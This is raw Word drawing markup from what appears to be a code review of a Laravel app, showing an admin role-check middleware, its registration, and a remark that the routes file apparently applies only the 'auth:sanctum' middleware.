              <v:group w14:anchorId="771F89FA" id="Group 28832" o:spid="_x0000_s1069" style="width:510.25pt;height:145.5pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="64801,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&#10;cmV2LnhtbFBLBQYAAAAABAAEAPMAAAA4DgAAAAA=&#10;">
                <v:shape id="Shape 460" o:spid="_x0000_s1070" style="position:absolute;width:64801;height:14097;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="6480126,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qLwvwAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/LisIw&#10;FN0L/kO4gjtNLCpOxygivnDn4wPuNNe2THNTmqj1781CcHk47/mytZV4UONLxxpGQwWCOHOm5FzD&#10;9bIdzED4gGywckwaXuRhueh25pga9+QTPc4hFzGEfYoaihDqVEqfFWTRD11NHLmbayyGCJtcmgaf&#10;MdxWMlFqKi2WHBsKrGldUPZ/vlsNyW1rjsnPZqLy5G83uVQqrPdK636vXf2CCNSGr/jjPhgN42mc&#10;H8/EIyAXbwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAAAAAA&#10;AAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAAAAAA&#10;AAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBeNqLwvwAAANwAAAAPAAAAAAAA&#10;AAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA8wIAAAAA&#10;" path="m19050,l6467474,v2527,,4956,481,7290,1448l6480126,5031r,1399634l6474764,1408246v-2334,967,-4763,1451,-7290,1454l19050,1409700v-2526,-3,-4956,-487,-7290,-1454c9426,1407279,7366,1405902,5580,1404119v-1787,-1789,-3163,-3848,-4130,-6183l,1390650,,19050,1450,11757c2417,9423,3793,7364,5580,5578,7366,3792,9426,2415,11760,1448,14094,481,16524,,19050,xe" fillcolor="#102b46" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,6480126,1409700"/>
                </v:shape>
                <v:rect id="Rectangle 554" o:spid="_x0000_s1071" style="position:absolute;left:1007;top:1550;width:3259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4B398EEF" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>// app/Http/Middleware/AdminMiddleware.php:25</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 555" o:spid="_x0000_s1072" style="position:absolute;left:1007;top:3264;width:2969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387204C3" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>if ($request-&gt;</w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>user(</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>)-&gt;</w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>role !</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>== 'admin</w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>') {</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 556" o:spid="_x0000_s1073" style="position:absolute;left:1007;top:4979;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31D6DB6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557" o:spid="_x0000_s1074" style="position:absolute;left:3186;top:4979;width:2607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65061F9D" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">return </w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>response(</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>)-&gt;</w:t>
                        </w:r>
                        <w:proofErr w:type="spellStart"/>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>json</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 403);</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 558" o:spid="_x0000_s1075" style="position:absolute;left:1007;top:6693;width:72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59502C44"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559" o:spid="_x0000_s1076" style="position:absolute;left:1007;top:10122;width:1810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023156C2" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>// app/Http/Kernel.php:67</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 560" o:spid="_x0000_s1077" style="position:absolute;left:1007;top:11932;width:3984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7CA57000" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">'admin' =&gt; </w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>\App\Http\Middleware\</w:t>
                        </w:r>
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>AdminMiddleware</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class,</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 561" o:spid="_x0000_s1078" style="position:absolute;top:15518;width:675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6D8AF642" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">A grep of </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 562" o:spid="_x0000_s1079" style="position:absolute;left:5048;top:15430;width:4667;height:1334;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="4667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CjwgAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/NqsIw&#10;FIT3gu8QjuBOU5VW6TWKPwjuRL3g9tzm3LbYnJQman17Iwguh5n5hpkvW1OJOzWutKxgNIxAEGdW&#10;l5wr+D3vBjMQziNrrCyTgic5WC66nTmm2j74SPeTz0WAsEtRQeF9nUrpsoIMuqGtiYP3bxuDPsgm&#10;l7rBR4CbSo6jKJEGSw4LBda0KSi7nm5GAW2rKE6ms8NNT/Aal5fN5W/9VKrfa1c/IDy1/hv+tPda&#10;QZyM4X0mHAG5eAEAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAtTdCjwgAAANwAAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" path="m9525,l457200,v2630,,4875,930,6735,2787c465795,4648,466725,6896,466725,9525r,114300c466725,126454,465795,128699,463935,130556v-1860,1861,-4105,2791,-6735,2794l9525,133350v-2630,-3,-4875,-933,-6735,-2794c930,128699,,126454,,123825l,9525c,6896,930,4648,2790,2787,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,466725,133350"/>
                </v:shape>
                <v:rect id="Rectangle 563" o:spid="_x0000_s1080" style="position:absolute;left:5350;top:15667;width:5426;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7C3AAD5A" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>routes/</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 564" o:spid="_x0000_s1081" style="position:absolute;left:9700;top:15518;width:482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4EA86568" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve"> found </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 565" o:spid="_x0000_s1082" style="position:absolute;left:13330;top:15518;width:280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B9BD25E" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="0B2D56"/>
                          </w:rPr>
                          <w:t>one</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 566" o:spid="_x0000_s1083" style="position:absolute;left:15440;top:15518;width:2333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574AC26E" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve"> middleware </w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:t>call</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:t xml:space="preserve"> in the entire file: </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 567" o:spid="_x0000_s1084" style="position:absolute;left:32956;top:15430;width:19812;height:1334;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1981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1EoxQAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/NasJA&#10;FIX3hb7DcAV3zcSWGomOIg1FwU1N1fU1c02CmTtpZozp23cKhS4P5+fjLFaDaURPnastK5hEMQji&#10;wuqaSwWHz/enGQjnkTU2lknBNzlYLR8fFphqe+c99bkvRRhhl6KCyvs2ldIVFRl0kW2Jg3exnUEf&#10;ZFdK3eE9jJtGPsfxVBqsORAqbOmtouKa30zgxrvT8aNcnzV+FdklO+3yl02i1Hg0rOcgPA3+P/zX&#10;3moFr9MEfs+EIyCXPwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCyD1EoxQAAANwAAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m9525,l1971675,v2630,,4875,930,6735,2787c1980270,4648,1981200,6896,1981200,9525r,114300c1981200,126454,1980270,128699,1978410,130556v-1860,1861,-4105,2791,-6735,2794l9525,133350v-2630,-3,-4875,-933,-6735,-2794c930,128699,,126454,,123825l,9525c,6896,930,4648,2790,2787,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,1981200,133350"/>
                </v:shape>
                <v:rect id="Rectangle 568" o:spid="_x0000_s1085" style="position:absolute;left:33257;top:15667;width:2558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4749C98F" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>Route::</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>middleware('</w:t>
                        </w:r>
                        <w:proofErr w:type="spellStart"/>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>auth:sanctum</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>')</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 569" o:spid="_x0000_s1086" style="position:absolute;left:52762;top:15518;width:728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8375F23" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve"> at line 31.</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 570" o:spid="_x0000_s1087" style="position:absolute;top:17145;width:13335;height:1333;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1333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IvwgAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/Pa8Iw&#10;FL4L/g/hCd5mqjIn1Sgiuk3YRS3o8dE8m2rzUpqo3X+/HAYeP77f82VrK/GgxpeOFQwHCQji3OmS&#10;CwXZcfs2BeEDssbKMSn4JQ/LRbczx1S7J+/pcQiFiCHsU1RgQqhTKX1uyKIfuJo4chfXWAwRNoXU&#10;DT5juK3kKEkm0mLJscFgTWtD+e1wtwryzek2/tmPv5wx5+wzqza7+poo1e+1qxmIQG14if/d31rB&#10;+0ecH8/EIyAXfwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCRM6IvwgAAANwAAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" path="m9525,l1323975,v2630,,4875,930,6735,2787c1332570,4648,1333500,6896,1333500,9525r,114300c1333500,126454,1332570,128699,1330710,130559v-1860,1858,-4105,2788,-6735,2791l9525,133350v-2630,-3,-4875,-933,-6735,-2791l,123825,,9525,2790,2787c4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,1333500,133350"/>
                </v:shape>
                <v:rect id="Rectangle 571" o:spid="_x0000_s1088" style="position:absolute;left:269;top:17381;width:1705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4870CAD9" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>AuthServiceProvider:15</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
